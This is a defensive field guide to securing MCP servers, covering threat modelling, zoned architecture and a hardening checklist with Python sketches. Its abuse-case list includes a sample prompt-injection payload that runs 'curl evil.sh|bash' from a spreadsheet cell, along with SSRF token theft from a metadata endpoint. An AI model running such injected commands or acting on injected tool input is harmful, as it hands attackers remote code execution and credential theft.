Securing the Model Context Protocol (MCP) Server

Yet another guide?

There are already many articles about securing MCP servers. This one is a deep but actionable field guide that can also be used as a checklist. It is written for security architects, DevOps teams, and AI engineers who need to ship an MCP stack without becoming the next supply-chain headline.

1. THREAT MODEL – WHAT CAN ACTUALLY GO WRONG?

1.1 Asset inventory

MCP Server binary (Node, Go, Python, or Rust)

Tool descriptors (JSON schemas, prompts, system instructions)

Secrets vault (OAuth refresh tokens, DB creds, API keys)

LLM client channel (WebSocket, SSE, gRPC)

Downstream APIs (Stripe, Snowflake, GitHub, Kubernetes, etc.)

Log pipeline (Loki, Splunk, CloudWatch, Datadog)



1.2 Adversary personas

1.3 Some sample abuse cases

OAuth token theft via server-side request forgery (SSRF) – attacker tricks MCP server into calling metadata.google.internal and harvests GCP access tokens.

Cross-tenant confused-deputy – server re-uses a high-privilege SaaS token across users, letting User A read User B’s CRM records.

Prompt injection → Remote code execution – user embeds “; os.system("curl evil.sh|bash")” inside a “harmless” spreadsheet cell; MCP server passes the cell to a Python tool without sanitization.

Dependency typosquat – mcp-toolbox vs. mcp-toolbx on PyPI; latter contains info-stealer that phones home credentials.

Log injection → credential leak – server prints unsanitized tool output that contains an API key; log aggregator ingests and later exposes it to support staff.

Replay on unauthenticated SSE stream – attacker replays an old event containing PII because the endpoint required no JWT.

Denial-of-wallet via expensive tools – attacker spawns 10,000 bigquery.jobs.query calls with maximum_bytes_billed unset; cloud bill explodes.

Model DoS through context flooding – malicious tool returns 2 MB of garbage per call, filling the LLM context window and freezing the agent.

Downstream ACL drift – database role mcp_writer accumulates ALTER/DROP rights after a DBA “quick fix”; MCP server retains the expanded grant.

Container escape via privileged Docker socket mounted for “easy CI” – standard stuff, but now the socket is reachable through the natural-language interface.
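The SSRF case at the top of this list is the easiest one to guard against in code. Below is a minimal sketch of an outbound-URL check, assuming a hypothetical ALLOWED_HOSTS set and an injectable resolver (both are illustrative names, not part of any MCP SDK). It denies by default, requires HTTPS, and rejects any host that resolves to a non-public address such as the 169.254.169.254 metadata endpoint.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Hypothetical allow-list; in practice this would come from reviewed config.
ALLOWED_HOSTS = {"api.stripe.com", "api.github.com"}


def is_public_ip(addr: str) -> bool:
    """True only for globally routable addresses.

    Loopback, RFC 1918, and link-local ranges (which include the cloud
    metadata address 169.254.169.254) all return False.
    """
    return ipaddress.ip_address(addr).is_global


def check_outbound_url(url: str, resolve=socket.getaddrinfo) -> bool:
    """Return True if a tool may fetch `url`; anything doubtful is denied."""
    try:
        parts = urlsplit(url)
        port = parts.port or 443
    except ValueError:
        return False
    if parts.scheme != "https" or parts.hostname is None:
        return False
    host = parts.hostname.lower().rstrip(".")
    if host not in ALLOWED_HOSTS:
        return False
    try:
        infos = resolve(host, port, type=socket.SOCK_STREAM)
    except OSError:
        return False
    # Every resolved address must be public, not just the first one.
    return bool(infos) and all(is_public_ip(info[4][0]) for info in infos)
```

This check alone does not stop DNS rebinding, because the HTTP client resolves the name again when it connects. A fuller version would connect to the exact address that was validated.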

2. REFERENCE ARCHITECTURE WITH SECURITY ZONES

Think of the MCP stack as a control plane (Zone 0) surrounded by three concentric zones (Zones 1 to 3):



ZONE 0 – Control Plane

Vault cluster (PKI + dynamic secrets)

Policy registry (OPA / Cedar)

Observability bus (OTEL → SIEM)

See Figure 1:

Figure 1: Zone 0 of MCP Servers Architecture



ZONE 1 – MCP Server Fleet

Stateless pods behind an mTLS mesh (Linkerd or Istio)

Read-only root filesystem, no service account token automount

Sidecar: OPA-agent for fine-grained authz

ZONE 2 – Tool Runtime

Firecracker micro-VMs or gVisor sandboxes per tool invocation

Ephemeral overlay network; egress allowed only to a pre-declared set of FQDNs pulled from an allow-list ConfigMap

5-minute TTL on every IAM credential issued by Vault

ZONE 3 – Downstream APIs

SaaS tenants, DBs, K8s clusters, etc.

Each receives a scoped, audience-restricted token that is useless anywhere else.

Network policy enforces that ZONE 2 can reach ZONE 3 but never ZONE 0; ZONE 0 can push policy into ZONE 1 but never accepts inbound data.
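The reachability rules above amount to a small default-deny matrix. The sketch below writes it down so that it could be unit-tested alongside the real network policy. The Zone 1 to Zone 2 flow is an assumption (the server fleet has to dispatch tool invocations somehow), and the names are illustrative.

```python
# Directed flows permitted between zones; anything not listed is denied.
ALLOWED_FLOWS = {
    (0, 1),  # control plane pushes policy into the server fleet
    (1, 2),  # assumption: servers dispatch tool invocations into the runtime
    (2, 3),  # tool runtime calls downstream APIs
}


def is_flow_allowed(src_zone: int, dst_zone: int) -> bool:
    """Default-deny check for a connection from src_zone to dst_zone."""
    return (src_zone, dst_zone) in ALLOWED_FLOWS
```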

Figure 2 depicts 3 zones for MCP Server Architectures

Figure 2: Three zones for MCP Server Architectures

3. HARDENING CHECKLIST

☐ Transport

Every JSON-RPC frame travels over TLS 1.3 with an AES-256-GCM cipher suite (TLS_AES_256_GCM_SHA384), X25519 key exchange, and enforced SNI.

Optional: add application-layer JWE (JSON Web Encryption) when you need end-to-end secrecy from the LLM host itself.
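As a rough illustration of the transport items, the sketch below uses Python's standard ssl module to refuse anything older than TLS 1.3 and to abort handshakes that present an unexpected SNI name. EXPECTED_SNI and its hostname are placeholders. Pinning the specific cipher suite and key-exchange group is not shown here.

```python
import ssl

# Hypothetical server name; replace with the names your gateway actually serves.
EXPECTED_SNI = {"mcp.example.internal"}


def make_client_context() -> ssl.SSLContext:
    """Client context that verifies certificates and refuses TLS < 1.3."""
    ctx = ssl.create_default_context()  # certificate and hostname checks on
    ctx.minimum_version = ssl.TLSVersion.TLSv1_3
    return ctx


def reject_unknown_sni(ssl_sock, server_name, ssl_ctx):
    """SNI callback: abort the handshake for missing or unexpected names."""
    if server_name not in EXPECTED_SNI:
        return ssl.ALERT_DESCRIPTION_UNRECOGNIZED_NAME
    return None  # None lets the handshake continue


def make_server_context(certfile: str, keyfile: str) -> ssl.SSLContext:
    """Server context with TLS 1.3 as the floor and SNI enforcement."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ctx.minimum_version = ssl.TLSVersion.TLSv1_3
    ctx.load_cert_chain(certfile, keyfile)
    ctx.sni_callback = reject_unknown_sni
    return ctx
```

In a mesh deployment the sidecar usually terminates TLS, so settings like these would live in the mesh configuration rather than in the server process.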

☐ Authentication

Support both user and workload identities:

Human: OAuth 2.1 + OpenID Connect + MFA (FIDO2/WebAuthn).

Service: mTLS with SPIFFE IDs or DPoP-bound JWTs.

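Reject unsigned or anonymous requests at the edge gateway with a uniform 401 Unauthorized: the same status, headers, and body whether or not the user exists, so the response cannot be used for user-id probing. Do not substitute 421 Misdirected Request; it signals that the request reached a server that is not authoritative for the target URI, and clients may retry it on another connection.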

☐ Authorization

Use a policy-as-code engine (OPA, Cedar, or Zanzibar-like) that evaluates:

subject (user or agent ID)

action (tool name + method)

resource (tenant, project, DB schema)

context (IP risk score, device health, time of day)

Default-deny; no wildcards like tools.*.
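A real deployment would express this in Rego or Cedar. The plain-Python sketch below only illustrates the shape of the decision. Rule, Request, and the max_ip_risk threshold are hypothetical names chosen for this example. Rules containing a wildcard are refused when they are created, and a request is allowed only when one rule matches it exactly.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    subject: str              # user or agent ID
    action: str               # tool name + method
    resource: str             # tenant, project, or DB schema
    max_ip_risk: float = 0.5  # illustrative context condition

    def __post_init__(self):
        # Wildcards such as "tools.*" are rejected when the rule is defined.
        for value in (self.subject, self.action, self.resource):
            if "*" in value:
                raise ValueError(f"wildcards are not allowed: {value!r}")


@dataclass(frozen=True)
class Request:
    subject: str
    action: str
    resource: str
    ip_risk: float


def is_allowed(request: Request, rules: list) -> bool:
    """Default-deny: allow only when one rule matches every field exactly."""
    for rule in rules:
        same_target = (rule.subject, rule.action, rule.resource) == (
            request.subject, request.action, request.resource)
        if same_target and request.ip_risk <= rule.max_ip_risk:
            return True
    return False
```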

☐ Input validation

JSON Schema strict mode: set additionalProperties to false.

Max string length 8 kB; max array length 1,000 elements; max depth 15.

Reject Unicode direction-change characters (bidi attacks) and back-tick-heavy payloads that hint at prompt injection.

Run semgrep with OWASP JavaScript rules on every tool file at CI time.
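The size, depth, and bidi limits above are simple to enforce before arguments ever reach a tool. The following is a sketch only. The function names are made up for this example, the string limit is read as 8 kB of UTF-8, and depth is counted with the top-level object as 1 and each nested value one level deeper (the text does not say how depth is counted, so that is an assumption).

```python
MAX_STRING_BYTES = 8 * 1024
MAX_ARRAY_ITEMS = 1000
MAX_DEPTH = 15

# Unicode direction-change controls (embeddings, overrides, isolates, marks).
BIDI_CONTROLS = set(
    "\u202a\u202b\u202c\u202d\u202e\u2066\u2067\u2068\u2069\u200e\u200f"
)


def check_limits(value, depth: int = 1) -> None:
    """Recursively enforce length, size, depth, and bidi rules."""
    if depth > MAX_DEPTH:
        raise ValueError("nesting too deep")
    if isinstance(value, str):
        if len(value.encode("utf-8")) > MAX_STRING_BYTES:
            raise ValueError("string too long")
        if BIDI_CONTROLS.intersection(value):
            raise ValueError("bidi control character in string")
    elif isinstance(value, list):
        if len(value) > MAX_ARRAY_ITEMS:
            raise ValueError("array too long")
        for item in value:
            check_limits(item, depth + 1)
    elif isinstance(value, dict):
        for key, item in value.items():
            check_limits(key, depth + 1)
            check_limits(item, depth + 1)


def validate_tool_args(args, allowed_keys) -> None:
    """Reject unknown top-level keys, then apply the structural limits."""
    if not isinstance(args, dict):
        raise ValueError("arguments must be a JSON object")
    extra = set(args) - set(allowed_keys)
    if extra:
        raise ValueError(f"unexpected properties: {sorted(extra)}")
    check_limits(args)
```

This complements a JSON Schema validator rather than replacing it. Types, required fields, and nested additionalProperties checks still belong in the schema.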

☐ Output sanitization

If the downstream API returns a 4xx/5xx, return a generic message to the LLM; ship the real error to the log only.

Strip AWS access-key patterns, GCP OAuth tokens, and credit-card PANs using a streaming regex filter before the payload re-enters the LLM context.
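Here is a small sketch of the secret-stripping filter. The patterns are assumptions based on commonly observed formats: AWS access key IDs starting with AKIA or ASIA, Google OAuth access tokens starting with ya29., and 13 to 19 digit card numbers that pass a Luhn check. It works on a complete string. A truly streaming version would also need to buffer across chunk boundaries so that a secret split over two chunks is still caught.

```python
import re

AWS_KEY = re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b")
GCP_TOKEN = re.compile(r"\bya29\.[0-9A-Za-z_\-]+")
# 13 to 19 digits, optionally separated by single spaces or hyphens.
PAN_CANDIDATE = re.compile(r"\b\d(?:[ -]?\d){12,18}\b")


def luhn_ok(digits: str) -> bool:
    """Luhn checksum, used to cut false positives on long digit runs."""
    total = 0
    for index, char in enumerate(reversed(digits)):
        digit = int(char)
        if index % 2 == 1:  # double every second digit from the right
            digit *= 2
            if digit > 9:
                digit -= 9
        total += digit
    return total % 10 == 0


def _mask_pan(match):
    digits = re.sub(r"\D", "", match.group())
    return "[REDACTED_PAN]" if luhn_ok(digits) else match.group()


def sanitize(text: str) -> str:
    """Mask credential-like substrings before text re-enters the LLM context."""
    text = AWS_KEY.sub("[REDACTED_AWS_KEY]", text)
    text = GCP_TOKEN.sub("[REDACTED_GCP_TOKEN]", text)
    return PAN_CANDIDATE.sub(_mask_pan, text)
```

Pattern-based masking is a backstop. It will miss secrets in formats it has never seen, so it should sit behind scoped, short-lived credentials, not replace them.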

☐ Secrets lifecycle

Store in Vault; enable dynamic secrets (e.g., 15-minute Postgres roles, 60-minute AWS STS).

Never expose VAULT_TOKEN or GOOGLE_APPLICATION_CREDENTIALS as long-lived environment variables inside the tool container; inject short-lived credentials as files on a tmpfs mount and remove them on exit.

Version and rotate every static secret automatically; open a JIRA ticket on failure.
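One way to handle the "inject via tmpfs and remove on exit" step is a context manager that writes the credential to a memory-backed directory and unlinks it when the tool call finishes. This is a sketch under assumptions: ephemeral_secret is a made-up helper, and /dev/shm is assumed to be a tmpfs mount, which is typical on Linux but should be verified for your runtime.

```python
import os
import tempfile
from contextlib import contextmanager


@contextmanager
def ephemeral_secret(secret: bytes, base_dir: str = "/dev/shm"):
    """Write `secret` to a private file in base_dir and delete it on exit.

    base_dir is assumed to be a tmpfs mount so the bytes never reach disk.
    mkstemp creates the file readable and writable only by the current user.
    """
    fd, path = tempfile.mkstemp(dir=base_dir)
    try:
        with os.fdopen(fd, "wb") as handle:
            handle.write(secret)
        yield path
    finally:
        try:
            os.unlink(path)
        except FileNotFoundError:
            pass  # already removed by the caller
```

A tool wrapper would then pass the yielded path to the client library (for example as a credentials file argument) instead of exporting the secret into the environment.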

☐ Sandboxing

Prefer gVisor or Firecracker over vanilla Docker.

Set seccomp=RuntimeDefault, drop=ALL capabilities, readOnlyRootFilesystem=true.

Use a tmpfs volume sized to 50 % of RAM for scratch; mount no Docker socket, /proc, or hostPath.
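These settings are easy to lose in a later manifest edit, so it can help to assert them in CI. The sketch below audits a Kubernetes pod spec that has already been parsed into a dict. audit_pod_spec is an illustrative helper, not an existing tool. It checks only the seccomp, capabilities, read-only root, and hostPath items named above.

```python
def audit_pod_spec(spec: dict) -> list:
    """Return a list of findings; an empty list means the checks passed."""
    findings = []
    pod_seccomp = (
        spec.get("securityContext", {}).get("seccompProfile", {}).get("type")
    )

    # hostPath volumes cover the Docker socket and host /proc mounts.
    for volume in spec.get("volumes", []):
        if "hostPath" in volume:
            findings.append(f"volume {volume.get('name')}: hostPath not allowed")

    for container in spec.get("containers", []):
        name = container.get("name", "<unnamed>")
        ctx = container.get("securityContext", {})
        # The container-level seccomp profile overrides the pod-level one.
        seccomp = ctx.get("seccompProfile", {}).get("type", pod_seccomp)
        if seccomp != "RuntimeDefault":
            findings.append(f"{name}: seccomp profile is not RuntimeDefault")
        if "ALL" not in ctx.get("capabilities", {}).get("drop", []):
            findings.append(f"{name}: capabilities do not drop ALL")
        if ctx.get("readOnlyRootFilesystem") is not True:
            findings.append(f"{name}: root filesystem is writable")
    return findings
```

An admission controller or policy engine is the stronger enforcement point. A check like this mainly gives faster feedback in pull requests.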

☐ Rate limiting & quotas

Per-subject token bucket: 100 requests / minute, burst 20.

Per-tool cost quota: declare a $maxCost in USD (e.g., $5 per call for BigQuery on-demand); cut the tool off hard once the monthly budget is exceeded.

Global circuit-breaker: if p99 latency >2 s or error rate >10 %, auto-disable tool for 5 min and page on-call.
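The per-subject token bucket from the first item can be sketched in a few lines. The version below refills at 100 tokens per minute with a capacity of 20, matching the numbers above. The class names and the injectable clock are illustrative choices, and the in-memory dict would need to become a shared store such as Redis for a multi-pod fleet.

```python
import time


class TokenBucket:
    """Token bucket: refills continuously, holds at most `burst` tokens."""

    def __init__(self, rate_per_minute: float = 100, burst: int = 20,
                 clock=time.monotonic):
        self.rate = rate_per_minute / 60.0  # tokens added per second
        self.capacity = float(burst)
        self.tokens = float(burst)          # start full
        self.clock = clock
        self.updated = clock()

    def allow(self) -> bool:
        """Consume one token if available; return False when throttled."""
        now = self.clock()
        elapsed = now - self.updated
        self.tokens = min(self.capacity, self.tokens + elapsed * self.rate)
        self.updated = now
        if self.tokens >= 1.0:
            self.tokens -= 1.0
            return True
        return False


class RateLimiter:
    """Keeps one independent bucket per subject (user or agent ID)."""

    def __init__(self, clock=time.monotonic):
        self.clock = clock
        self.buckets = {}

    def allow(self, subject: str) -> bool:
        bucket = self.buckets.get(subject)
        if bucket is None:
            bucket = self.buckets[subject] = TokenBucket(clock=self.clock)
        return bucket.allow()
```

A subject can spend its burst of 20 immediately and is then held to the sustained rate. The cost quota and circuit breaker are separate controls layered on top of this.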

☐ Observability

Emit OpenTelemetry traces with traceparent header; redact any value whose key matches *token*, *key*, *secret*.

Forward to SIEM with UEBA rules: detect impossible travel, token reuse from two continents within 5 min, or a single user calling >5 tools in <1 s (scripting indicator).
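For the redaction rule in the first item, a recursive key-based filter can be applied to span attributes or log records before they are exported. This is a minimal sketch using only the standard library. The function names are made up, and matching is case-insensitive against the three glob patterns from the text.

```python
from fnmatch import fnmatchcase

SENSITIVE_KEY_PATTERNS = ("*token*", "*key*", "*secret*")


def is_sensitive(key) -> bool:
    """Case-insensitive glob match of a key against the sensitive patterns."""
    lowered = str(key).lower()
    return any(fnmatchcase(lowered, pattern) for pattern in SENSITIVE_KEY_PATTERNS)


def redact(value):
    """Return a copy of `value` with sensitive keys masked at any depth."""
    if isinstance(value, dict):
        return {
            key: "[REDACTED]" if is_sensitive(key) else redact(item)
            for key, item in value.items()
        }
    if isinstance(value, list):
        return [redact(item) for item in value]
    return value
```

Substring patterns over-match by design (a key named "monkey" would be masked too). For telemetry that is usually the safer failure mode.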